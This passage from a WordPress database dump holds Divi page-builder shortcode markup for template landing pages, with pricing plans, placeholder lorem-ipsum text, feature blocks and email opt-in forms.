custom_css_main_element=\"font-weight:300;\" text_line_height=\"1.1em\"]\n\n<p>$28</p>\n\n[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"center\" text_font=\"Roboto Light||||\" text_font_size=\"16\" text_text_color=\"#303030\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"0px||53px|\" custom_css_main_element=\"font-weight:300;\" text_line_height=\"1.1em\"]\n\n<p class=\"p1\"><span class=\"s1\">Per user/ month.</span></p>\n\n[/et_pb_text][et_pb_divider admin_label=\"Divider\" color=\"#efefec\" show_divider=\"on\" divider_style=\"solid\" divider_position=\"top\" hide_on_mobile=\"off\" height=\"1px\"]\n\n\n\n[/et_pb_divider][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"center\" text_font=\"Roboto||||\" text_font_size=\"18\" text_text_color=\"#303030\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"51px||0px|\" custom_css_main_element=\"font-weight:500;\" text_line_height=\"1.1em\"]\n\n<p><strong>10,000 messages</strong></p>\n\n[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"center\" text_font=\"Roboto||||\" text_font_size=\"18\" text_text_color=\"#303030\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"18px||0px|\" custom_css_main_element=\"font-weight:300;\" text_line_height=\"1.1em\"]\n\n<p><em>unlimited data</em></p>\n\n[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"center\" text_font=\"Roboto||||\" text_font_size=\"18\" text_text_color=\"#303030\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"13px||0px|\" custom_css_main_element=\"font-weight:300;\" text_line_height=\"1.1em\"]\n\n<p><em>unlimited users</em></p>\n\n[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"center\" text_font=\"Roboto||||\" text_font_size=\"18\" text_text_color=\"#303030\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"13px||47px|\" custom_css_main_element=\"font-weight:300;\" text_line_height=\"1.1em\"]\n\n<p><em>first 7 days free</em></p>\n\n[/et_pb_text][et_pb_button admin_label=\"Button\" button_url=\"#\" url_new_window=\"off\" button_text=\"BUTTON\" button_alignment=\"center\" background_layout=\"light\" custom_button=\"on\" button_text_size=\"13\" button_text_color=\"#ffffff\" button_bg_color=\"#3e51b5\" button_border_width=\"0\" button_border_color=\"#3e51b5\" button_border_radius=\"4\" button_letter_spacing=\"1\" button_font=\"Roboto||||\" button_use_icon=\"default\" button_icon_placement=\"right\" button_on_hover=\"on\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"#3e51b5\" button_border_color_hover=\"#3e51b5\" button_border_radius_hover=\"4\" button_letter_spacing_hover=\"1\" custom_css_before=\"display: none !important;\" custom_css_main_element=\"padding-top: 15px !important;||padding-right: 38px !important;||padding-bottom: 14px !important;||padding-left: 38px !important;||||font-weight:700;||||\"]\n\n\n\n[/et_pb_button][et_pb_divider admin_label=\"Divider\" color=\"#cbbce7\" show_divider=\"off\" divider_style=\"solid\" divider_position=\"top\" hide_on_mobile=\"off\" height=\"30px\"]\n\n\n\n[/et_pb_divider][/et_pb_column][et_pb_column type=\"1_3\"][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"center\" text_font=\"Roboto||||\" text_font_size=\"24\" text_text_color=\"#ffffff\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"46px||19px|\" custom_css_main_element=\"font-weight:400;\" text_line_height=\"1.5em\"]\n\n<p>Extended Plan</p>\n\n[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"center\" text_font=\"Roboto Light||||\" text_font_size=\"82\" text_text_color=\"#ffffff\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"0px||10px|\" custom_css_main_element=\"font-weight:300;\" text_line_height=\"1.1em\"]\n\n<p>$48</p>\n\n[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"center\" text_font=\"Roboto Light||||\" text_font_size=\"16\" text_text_color=\"#ffffff\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"0px||53px|\" custom_css_main_element=\"font-weight:300;\" text_line_height=\"1.1em\"]\n\n<p class=\"p1\"><span class=\"s1\">Per user/ month.</span></p>\n\n[/et_pb_text][et_pb_divider admin_label=\"Divider\" color=\"#5162bc\" show_divider=\"on\" divider_style=\"solid\" divider_position=\"top\" hide_on_mobile=\"off\" height=\"1px\"]\n\n\n\n[/et_pb_divider][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"center\" text_font=\"Roboto||||\" text_font_size=\"18\" text_text_color=\"#ffffff\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"51px||0px|\" custom_css_main_element=\"font-weight:500;\" text_line_height=\"1.1em\"]\n\n<p><strong>80,000 messages</strong></p>\n\n[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"center\" text_font=\"Roboto||||\" text_font_size=\"18\" text_text_color=\"#ffffff\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"18px||0px|\" custom_css_main_element=\"font-weight:300;\" text_line_height=\"1.1em\"]\n\n<p><em>unlimited data</em></p>\n\n[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"center\" text_font=\"Roboto||||\" text_font_size=\"18\" text_text_color=\"#ffffff\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"13px||0px|\" custom_css_main_element=\"font-weight:300;\" text_line_height=\"1.1em\"]\n\n<p><em>unlimited users</em></p>\n\n[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"center\" text_font=\"Roboto||||\" text_font_size=\"18\" text_text_color=\"#ffffff\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"13px||47px|\" custom_css_main_element=\"font-weight:300;\" text_line_height=\"1.1em\"]\n\n<p><em>first 7 days free</em></p>\n\n[/et_pb_text][et_pb_button admin_label=\"Button\" button_url=\"#\" url_new_window=\"off\" button_text=\"BUTTON\" button_alignment=\"center\" background_layout=\"light\" custom_button=\"on\" button_text_size=\"13\" button_text_color=\"#ffffff\" button_bg_color=\"rgba(255,255,255,0.1)\" button_border_width=\"0\" button_border_color=\"rgba(255,255,255,0.5)\" button_border_radius=\"4\" button_letter_spacing=\"1\" button_font=\"Roboto||||\" button_use_icon=\"default\" button_icon_placement=\"right\" button_on_hover=\"on\" button_text_color_hover=\"#303030\" button_bg_color_hover=\"#ffffff\" button_border_color_hover=\"#ffffff\" button_border_radius_hover=\"4\" button_letter_spacing_hover=\"1\" custom_css_before=\"display: none !important;\" custom_css_main_element=\"padding-top: 15px !important;||padding-right: 38px !important;||padding-bottom: 14px !important;||padding-left: 38px !important;||||font-weight:700;||||\"]\n\n\n\n[/et_pb_button][et_pb_divider admin_label=\"Divider\" color=\"#cbbce7\" show_divider=\"off\" divider_style=\"solid\" divider_position=\"top\" hide_on_mobile=\"off\" height=\"30px\"]\n\n\n\n[/et_pb_divider][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section admin_label=\"#5\" transparent_background=\"off\" background_color=\"#ede7f6\" allow_player_pause=\"off\" inner_shadow=\"off\" parallax=\"off\" parallax_method=\"off\" padding_mobile=\"on\" make_fullwidth=\"off\" use_custom_width=\"off\" width_unit=\"on\" make_equal=\"off\" use_custom_gutter=\"off\" custom_css_main_element=\"border-top: 1px solid #7E57C2;\" collapsed=\"off\" background_image=\"https://companyregistration.online/wp-content/uploads/2016/08/152.jpg\"][et_pb_row admin_label=\"Row\" make_fullwidth=\"off\" use_custom_width=\"off\" width_unit=\"on\" use_custom_gutter=\"off\" custom_padding=\"120px||10px|\" padding_mobile=\"on\" allow_player_pause=\"off\" parallax=\"off\" parallax_method=\"off\" make_equal=\"off\" parallax_1=\"off\" parallax_method_1=\"off\" parallax_2=\"off\" parallax_method_2=\"off\" column_padding_mobile=\"on\" custom_width_px=\"540px\" custom_padding_phone=\"41px||10px|\" custom_padding_last_edited=\"on|desktop\"][et_pb_column type=\"4_4\"][et_pb_divider admin_label=\"Divider Desktop\" color=\"#8d8b8a\" show_divider=\"on\" divider_style=\"solid\" divider_position=\"center\" divider_weight=\"2\" hide_on_mobile=\"off\" custom_css_main_element=\"width:50px;||margin-left: 47%;||margin-right: 47%;||\" height=\"19\" disabled=\"off\" disabled_on=\"on|on|\"]\n\n\n\n[/et_pb_divider][et_pb_divider admin_label=\"Divider Mobile\" color=\"#8d8b8a\" show_divider=\"on\" divider_style=\"solid\" divider_position=\"center\" divider_weight=\"2\" hide_on_mobile=\"off\" custom_css_main_element=\"width:50px;||margin-left: 44%;||margin-right: 44%;||\" height=\"19\" disabled=\"off\" disabled_on=\"||on\"]\n\n\n\n[/et_pb_divider][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"center\" text_font=\"Roboto Light||||\" text_font_size=\"52\" text_text_color=\"#ffffff\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"38px||0px|\" custom_css_main_element=\"font-weight:300;\" text_line_height=\"1.1em\" text_font_size_last_edited=\"on|phone\" text_font_size_phone=\"30\" text_font_size_tablet=\"46\"]\n\n<p>Get your copy today.</p>\n\n[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"center\" text_font=\"Roboto Light||||\" text_font_size=\"20\" text_text_color=\"#ffffff\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"18px||0px|\" custom_css_main_element=\"font-weight:300;\" max_width=\"540px\" text_line_height=\"1.5em\"]\n\n<p>Curabitur non nisi nec velit at tempor vulputate acut.</p>\n\n[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Row\" make_fullwidth=\"off\" use_custom_width=\"on\" width_unit=\"on\" custom_width_px=\"370px\" use_custom_gutter=\"off\" padding_mobile=\"on\" allow_player_pause=\"off\" parallax=\"off\" parallax_method=\"off\" make_equal=\"off\" parallax_1=\"off\" parallax_method_1=\"off\" column_padding_mobile=\"on\" custom_margin=\"43px|||\" custom_padding=\"0px||9.5%|\" custom_padding_last_edited=\"on|phone\" custom_margin_last_edited=\"on|phone\" custom_padding_phone=\"0px||50px|\" custom_margin_phone=\"10px|||\"][et_pb_column type=\"4_4\"][et_pb_contact_form admin_label=\"Temporary form (e.g. Newsletter)\" captcha=\"off\" use_redirect=\"off\" form_background_color=\"#ffffff\" input_border_radius=\"4\" title_font=\"Roboto||||\" title_font_size=\"18\" title_text_color=\"#673ab7\" form_field_font=\"Roboto||||\" form_field_font_size=\"18\" form_field_text_color=\"#303030\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_button=\"on\" button_text_size=\"16\" button_text_color=\"#ffffff\" button_bg_color=\"#3e51b5\" button_border_width=\"4\" button_border_color=\"#3e51b5\" button_border_radius=\"4\" button_letter_spacing=\"1\" button_font=\"Roboto|||on|\" button_use_icon=\"default\" button_icon_placement=\"right\" button_on_hover=\"on\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"#3e51b5\" button_border_color_hover=\"#3e51b5\" button_border_radius_hover=\"4\" button_letter_spacing_hover=\"1\" custom_css_contact_button=\"height:60px;||margin-top:8px;\" custom_css_contact_fields=\"height:60px;||\" custom_css_main_element=\"width:100%;||\"]\n\n[et_pb_contact_field field_title=\"Email\" field_type=\"input\" field_id=\"Email\" required_mark=\"on\" fullwidth_field=\"on\" input_border_radius=\"0\" form_field_font_select=\"default\" form_field_font=\"||||\" use_border_color=\"off\" border_style=\"solid\"]\n[/et_pb_contact_field]\n\n[/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','Landing Page #2','','publish','closed','closed','','landing-page-2-2','','','2016-08-19 02:18:28','2016-08-19 00:18:28','',0,'https://companyregistration.online/et_pb_layout/landing-page-2-2/',0,'et_pb_layout','',0),(27815,1,'2016-08-19 02:18:33','2016-08-19 00:18:33','[et_pb_section admin_label=\"#1\" transparent_background=\"off\" background_color=\"#ede7f6\" allow_player_pause=\"off\" inner_shadow=\"off\" parallax=\"off\" parallax_method=\"off\" padding_mobile=\"on\" make_fullwidth=\"off\" use_custom_width=\"off\" width_unit=\"on\" make_equal=\"off\" use_custom_gutter=\"off\" custom_padding=\"0px||0px|\" custom_css_main_element=\"border-top: 1px solid #7E57C2;\" collapsed=\"off\" background_image=\"https://companyregistration.online/wp-content/uploads/2016/08/011.jpg\"][et_pb_row admin_label=\"row\" make_fullwidth=\"off\" use_custom_width=\"off\" width_unit=\"on\" use_custom_gutter=\"off\" custom_padding=\"9.5%||0px|\" padding_mobile=\"on\" allow_player_pause=\"off\" parallax=\"off\" parallax_method=\"off\" make_equal=\"off\" parallax_1=\"off\" parallax_method_1=\"off\" parallax_2=\"off\" parallax_method_2=\"off\" column_padding_mobile=\"on\" custom_padding_phone=\"100px||0px|\" custom_padding_last_edited=\"on|phone\"][et_pb_column type=\"4_4\"][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"center\" text_font=\"Roboto Light||||\" text_font_size=\"24\" text_text_color=\"#ffffff\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"||0px|\" custom_css_main_element=\"font-weight:300;\"]\n\n<p>Wireframe Kit Vol. 01</p>\n\n[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"center\" text_font=\"Roboto Light||||\" text_font_size=\"64\" text_text_color=\"#ffffff\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"24px||22px|\" custom_css_main_element=\"font-weight:300;\" text_line_height=\"1.1em\" max_width=\"80%\" text_font_size_last_edited=\"on|phone\" text_font_size_phone=\"36\" max_width_last_edited=\"on|desktop\"]\n\n<p>Make your ideas a reality.</p>\n\n[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"center\" text_font=\"Roboto Light||||\" text_font_size=\"20\" text_text_color=\"#ffffff\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"0px||0px|\" custom_css_main_element=\"font-weight:300;\" max_width=\"720px\" text_line_height=\"1.5em\"]\n\n<p>Build beautiful Divi websites thanks to a modular content blocks that makes customization easy and enjoyable. Get your copy today.</p>\n\n[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Row\" make_fullwidth=\"off\" use_custom_width=\"on\" width_unit=\"on\" custom_width_px=\"370px\" use_custom_gutter=\"off\" padding_mobile=\"on\" allow_player_pause=\"off\" parallax=\"off\" parallax_method=\"off\" make_equal=\"off\" parallax_1=\"off\" parallax_method_1=\"off\" column_padding_mobile=\"on\" custom_margin=\"43px|||\" custom_padding=\"||9.5%|\" custom_padding_last_edited=\"on|phone\" custom_margin_last_edited=\"on|phone\" custom_padding_phone=\"10px||100px|\" custom_margin_phone=\"10px|||\"][et_pb_column type=\"4_4\"][et_pb_contact_form admin_label=\"Contact Form (i.e. Email Optin Module)\" captcha=\"off\" use_redirect=\"off\" form_background_color=\"#ffffff\" input_border_radius=\"4\" title_font=\"Roboto||||\" title_font_size=\"18\" title_text_color=\"#673ab7\" form_field_font=\"Roboto||||\" form_field_font_size=\"18\" form_field_text_color=\"#303030\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_button=\"on\" button_text_size=\"14\" button_text_color=\"#ffffff\" button_bg_color=\"#41bb99\" button_border_width=\"4\" button_border_color=\"#41bb99\" button_border_radius=\"4\" button_letter_spacing=\"1\" button_font=\"Roboto|||on|\" button_use_icon=\"default\" button_icon_placement=\"right\" button_on_hover=\"on\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"#41bb99\" button_border_color_hover=\"#41bb99\" button_border_radius_hover=\"4\" button_letter_spacing_hover=\"1\" custom_css_contact_button=\"height:60px;||margin-top:8px;\" custom_css_contact_fields=\"height:60px;||\" custom_css_main_element=\"width:100%;||\"]\n\n[et_pb_contact_field field_title=\"Email\" field_type=\"input\" field_id=\"Name\" required_mark=\"on\" fullwidth_field=\"on\" input_border_radius=\"0\" form_field_font_select=\"default\" form_field_font=\"||||\" use_border_color=\"off\" border_style=\"solid\"]\n\n\n\n[/et_pb_contact_field]\n\n[/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section admin_label=\"#2\" fullwidth=\"off\" specialty=\"off\" collapsed=\"off\" transparent_background=\"off\" allow_player_pause=\"off\" inner_shadow=\"off\" parallax=\"off\" parallax_method=\"off\" padding_mobile=\"off\" make_fullwidth=\"off\" use_custom_width=\"off\" width_unit=\"on\" make_equal=\"off\" use_custom_gutter=\"off\"][et_pb_row admin_label=\"Row\" make_fullwidth=\"off\" use_custom_width=\"on\" width_unit=\"on\" use_custom_gutter=\"off\" custom_padding=\"109px|||\" padding_mobile=\"on\" allow_player_pause=\"off\" parallax=\"off\" parallax_method=\"off\" make_equal=\"off\" parallax_1=\"off\" parallax_method_1=\"off\" parallax_2=\"off\" parallax_method_2=\"off\" column_padding_mobile=\"on\" custom_width_px=\"540px\" custom_padding_phone=\"41px|||\" custom_padding_last_edited=\"on|desktop\"][et_pb_column type=\"4_4\"][et_pb_divider admin_label=\"Divider Desktop\" color=\"#c1c1c1\" show_divider=\"on\" divider_style=\"solid\" divider_position=\"center\" divider_weight=\"2\" hide_on_mobile=\"off\" custom_css_main_element=\"width:50px;||margin-left: 47%;||margin-right: 47%;||\" height=\"19\" disabled=\"off\" disabled_on=\"on|on|\"]\n\n\n\n[/et_pb_divider][et_pb_divider admin_label=\"Divider Mobile\" color=\"#c1c1c1\" show_divider=\"on\" divider_style=\"solid\" divider_position=\"center\" divider_weight=\"2\" hide_on_mobile=\"off\" custom_css_main_element=\"width:50px;||margin-left: 44%;||margin-right: 44%;||\" height=\"19\" disabled=\"off\" disabled_on=\"||on\"]\n\n\n\n[/et_pb_divider][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"center\" text_font=\"Roboto Light||||\" text_font_size=\"52\" text_text_color=\"#303030\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"40px||0px|\" custom_css_main_element=\"font-weight:300;\" text_line_height=\"1.1em\" max_width=\"80%\" text_font_size_last_edited=\"on|phone\" text_font_size_phone=\"30\" text_font_size_tablet=\"46\"]\n\n<p>Beautiful websites.</p>\n\n[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"center\" text_font=\"Roboto Light||||\" text_font_size=\"20\" text_text_color=\"#303030\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"18px||0px|\" custom_css_main_element=\"font-weight:300;\" max_width=\"540px\" text_line_height=\"1.5em\"]\n\n<p>Build beautiful Divi websites thanks to a modular content blocks that makes customization easy and enjoyable.<br>Get your copy today.</p>\n\n[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Row\" make_fullwidth=\"off\" use_custom_width=\"off\" width_unit=\"on\" use_custom_gutter=\"off\" custom_padding=\"46px||65px|\" custom_padding_last_edited=\"on|desktop\" padding_mobile=\"on\" allow_player_pause=\"off\" parallax=\"off\" parallax_method=\"off\" make_equal=\"off\" parallax_1=\"off\" parallax_method_1=\"off\" parallax_2=\"off\" parallax_method_2=\"off\" parallax_3=\"off\" parallax_method_3=\"off\" column_padding_mobile=\"on\" custom_padding_phone=\"||46px|\" parallax_4=\"off\" parallax_method_4=\"off\"][et_pb_column type=\"1_4\"][et_pb_image admin_label=\"Image\" src=\"https://companyregistration.online/wp-content/uploads/2016/08/024.png\" show_in_lightbox=\"off\" url_new_window=\"off\" use_overlay=\"off\" animation=\"fade_in\" sticky=\"on\" align=\"center\" force_fullwidth=\"off\" always_center_on_mobile=\"off\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"8.4%||0px|\" custom_margin_phone=\"4.4%||0px|\" custom_margin_last_edited=\"on|phone\"]\n\n\n\n[/et_pb_image][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"center\" text_font=\"Roboto||||\" text_font_size=\"24\" text_text_color=\"#303030\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"32px||0px|\" custom_css_main_element=\"font-weight:400;\" text_line_height=\"1.5em\"]\n\n<p>Consultation</p>\n\n[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"center\" text_font=\"Roboto Light||||\" text_font_size=\"18\" text_text_color=\"#303030\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"6px||0px|\" custom_css_main_element=\"font-weight:300;\" text_line_height=\"1.5em\"]\n\n<p>Curabitur non nisi nec velit at tempor vulputate ac ut odio. Cras nec augue.</p>\n\n[/et_pb_text][/et_pb_column][et_pb_column type=\"1_4\"][et_pb_image admin_label=\"Image\" src=\"https://companyregistration.online/wp-content/uploads/2016/08/033.png\" show_in_lightbox=\"off\" url_new_window=\"off\" use_overlay=\"off\" animation=\"fade_in\" sticky=\"on\" align=\"center\" force_fullwidth=\"off\" always_center_on_mobile=\"off\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"8.4%||0px|\" custom_margin_phone=\"4.4%||0px|\" custom_margin_last_edited=\"on|phone\"]\n\n\n\n[/et_pb_image][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"center\" text_font=\"Roboto||||\" text_font_size=\"24\" text_text_color=\"#303030\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"32px||0px|\" custom_css_main_element=\"font-weight:400;\" text_line_height=\"1.5em\"]\n\n<p>Research</p>\n\n[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"center\" text_font=\"Roboto Light||||\" text_font_size=\"18\" text_text_color=\"#303030\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"6px||0px|\" custom_css_main_element=\"font-weight:300;\" text_line_height=\"1.5em\"]\n\n<p>Curabitur non nisi nec velit at tempor vulputate ac ut odio. Cras nec augue.</p>\n\n[/et_pb_text][/et_pb_column][et_pb_column type=\"1_4\"][et_pb_image admin_label=\"Image\" src=\"https://companyregistration.online/wp-content/uploads/2016/08/043.png\" show_in_lightbox=\"off\" url_new_window=\"off\" use_overlay=\"off\" animation=\"fade_in\" sticky=\"on\" align=\"center\" force_fullwidth=\"off\" always_center_on_mobile=\"off\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"8.4%||0px|\" custom_margin_phone=\"4.4%||0px|\" custom_margin_last_edited=\"on|phone\"]\n\n\n\n[/et_pb_image][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"center\" text_font=\"Roboto||||\" text_font_size=\"24\" text_text_color=\"#303030\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"32px||0px|\" custom_css_main_element=\"font-weight:400;\" text_line_height=\"1.5em\"]\n\n<p>Design</p>\n\n[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"center\" text_font=\"Roboto Light||||\" text_font_size=\"18\" text_text_color=\"#303030\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"6px||0px|\" custom_css_main_element=\"font-weight:300;\" text_line_height=\"1.5em\"]\n\n<p>Curabitur non nisi nec velit at tempor vulputate ac ut odio. Cras nec augue.</p>\n\n[/et_pb_text][/et_pb_column][et_pb_column type=\"1_4\"][et_pb_image admin_label=\"Image\" src=\"https://companyregistration.online/wp-content/uploads/2016/08/054.png\" show_in_lightbox=\"off\" url_new_window=\"off\" use_overlay=\"off\" animation=\"fade_in\" sticky=\"on\" align=\"center\" force_fullwidth=\"off\" always_center_on_mobile=\"off\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"8.4%||0px|\" custom_margin_phone=\"4.4%||0px|\" custom_margin_last_edited=\"on|phone\"]\n\n\n\n[/et_pb_image][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"center\" text_font=\"Roboto||||\" text_font_size=\"24\" text_text_color=\"#303030\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"32px||0px|\" custom_css_main_element=\"font-weight:400;\" text_line_height=\"1.5em\"]\n\n<p>Build</p>\n\n[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"center\" text_font=\"Roboto Light||||\" text_font_size=\"18\" text_text_color=\"#303030\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"6px||0px|\" custom_css_main_element=\"font-weight:300;\" text_line_height=\"1.5em\"]\n\n<p>Curabitur non nisi nec velit at tempor vulputate ac ut odio. Cras nec augue.</p>\n\n[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section admin_label=\"#3\" fullwidth=\"off\" specialty=\"off\" transparent_background=\"off\" background_color=\"#ffffff\" allow_player_pause=\"off\" inner_shadow=\"off\" parallax=\"off\" parallax_method=\"off\" padding_mobile=\"off\" make_fullwidth=\"off\" use_custom_width=\"off\" width_unit=\"on\" make_equal=\"off\" use_custom_gutter=\"off\" collapsed=\"off\"][et_pb_row admin_label=\"Row\" make_fullwidth=\"on\" use_custom_width=\"off\" width_unit=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" padding_mobile=\"on\" allow_player_pause=\"off\" parallax=\"off\" parallax_method=\"off\" make_equal=\"off\" parallax_1=\"off\" parallax_method_1=\"off\" parallax_2=\"off\" parallax_method_2=\"off\" padding_top_2=\"6%\" padding_bottom_2=\"6%\" column_padding_mobile=\"on\" custom_padding=\"0px||130px|\" padding_2_last_edited=\"on|tablet\" padding_2_tablet=\"4%|10%|4%|10%\" padding_2_phone=\"14%|10%|0px|10%\" custom_padding_last_edited=\"on|phone\" custom_padding_tablet=\"0px||100px|\" custom_padding_phone=\"0px||50px|\"][et_pb_column type=\"1_2\"][et_pb_image admin_label=\"Image\" src=\"https://companyregistration.online/wp-content/uploads/2016/08/064.png\" show_in_lightbox=\"off\" url_new_window=\"off\" use_overlay=\"off\" animation=\"fade_in\" sticky=\"off\" align=\"center\" force_fullwidth=\"off\" always_center_on_mobile=\"on\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\"]\n\n\n\n[/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\"][et_pb_divider admin_label=\"Divider Desktop\" color=\"#c1c1c1\" show_divider=\"on\" divider_style=\"solid\" divider_position=\"top\" divider_weight=\"2\" hide_on_mobile=\"off\" custom_css_main_element=\"width:50px;||margin-top:-17%;\" height=\"19\" disabled=\"off\" disabled_on=\"on|on|\"]\n\n\n\n[/et_pb_divider][et_pb_divider admin_label=\"Divider Mobile\" color=\"#c1c1c1\" show_divider=\"on\" divider_style=\"solid\" divider_position=\"top\" divider_weight=\"2\" hide_on_mobile=\"off\" custom_css_main_element=\"width:50px;||\" height=\"19\" disabled=\"off\" disabled_on=\"||on\"]\n\n\n\n[/et_pb_divider][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Roboto Light||||\" text_font_size=\"52\" text_text_color=\"#303030\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"24px||0px|\" custom_css_main_element=\"font-weight:300;\" text_line_height=\"1.1em\" max_width=\"440px\" text_font_size_last_edited=\"on|tablet\" text_font_size_phone=\"30\" text_font_size_tablet=\"36\"]\n\n<p>A new era of websites is here.</p>\n\n[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Roboto Light||||\" text_font_size=\"20\" text_text_color=\"#303030\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"28px||41px|\" custom_css_main_element=\"font-weight:300;\" max_width=\"450px\" text_line_height=\"1.5em\"]\n\n<p>Build beautiful Divi websites thanks to a modular content blocks that makes customization easy and enjoyable. Get your copy today.</p>\n\n[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Roboto||||on\" text_font_size=\"16\" text_text_color=\"#303030\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"48px|||\" text_line_height=\"1.1em\" text_letter_spacing=\"1px\" text_font_size_last_edited=\"on|phone\" text_font_size_phone=\"12\" custom_margin_last_edited=\"on|phone\" custom_margin_phone=\"48px||50px|\"]\n\n<p>LEARN MORE</p>\n\n[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section admin_label=\"#5\" fullwidth=\"off\" specialty=\"off\" transparent_background=\"off\" background_color=\"#ffffff\" allow_player_pause=\"off\" inner_shadow=\"off\" parallax=\"off\" parallax_method=\"off\" custom_padding=\"0px||0px|\" padding_mobile=\"on\" make_fullwidth=\"off\" use_custom_width=\"off\" width_unit=\"on\" make_equal=\"off\" use_custom_gutter=\"off\" collapsed=\"off\"][et_pb_row admin_label=\"Row\" make_fullwidth=\"on\" use_custom_width=\"off\" width_unit=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" padding_mobile=\"on\" allow_player_pause=\"off\" parallax=\"off\" parallax_method=\"off\" make_equal=\"off\" parallax_1=\"off\" 